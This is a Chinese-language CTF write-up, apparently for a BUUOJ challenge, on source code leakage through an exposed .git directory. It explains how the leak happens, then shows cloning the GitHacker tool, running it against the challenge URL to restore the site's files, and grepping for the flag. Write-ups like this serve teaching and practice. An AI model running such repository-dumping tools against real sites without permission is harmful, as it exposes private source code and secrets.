• 知识点

• git文件泄露 详情

• 简述.git文件导致的源码泄露
  .git文件是开发人员在开发过程中使用 Git(分布式版本控制系统)做开发时产生的隐藏目录，该文件包含一些版本信息和网站源码，数据库信息等敏感信息。

• 原理利用
  1、通常开发人员在开发时，通常将源码提交到远程的托管网站（如Github）方便管理与交互，等到开发最后阶段，再将源码从远程服务器上下载到 web 目录下， 如果开发人员忘记将其中的 .git文件删除，则可以通过 .git文件恢复网站源码，来获取一些敏感信息；
  2、开发人员对站点使用 Git 对版本进行控制，实现自动部署，如果配置不当，直接将 .git文件加载到线上环境，这样便引起了.git文件泄露。

解题：
打开题目，直接提示 .Git 文件泄露：

所以我们在linux环境下，使用 GitHacker 来获取 .git文件；
获取 GitHacker 工具包：
git clone https://github.com/WangYihang/GitHacker.git

cd GitHacker
下载 .git 文件并使用python脚本自动恢复该目录下的文件：
python GitHacker.py http://6c7e2a80-81d9-4ac0-a658-d349a99b5b43.node3.buuoj.cn/.git/
下载恢复成功：得到一个 6c7e2a80-81d9-4ac0-a658-d349a99b5b43_node3_buuoj_cn_ 文件：

cd 6c7e2a80-81d9-4ac0-a658-d349a99b5b43_node3_buuoj_cn_

发现一个index.html,使用 grep 查找字符串即可得到flag （或者复制到主机使用浏览器打开）：
grep { index.html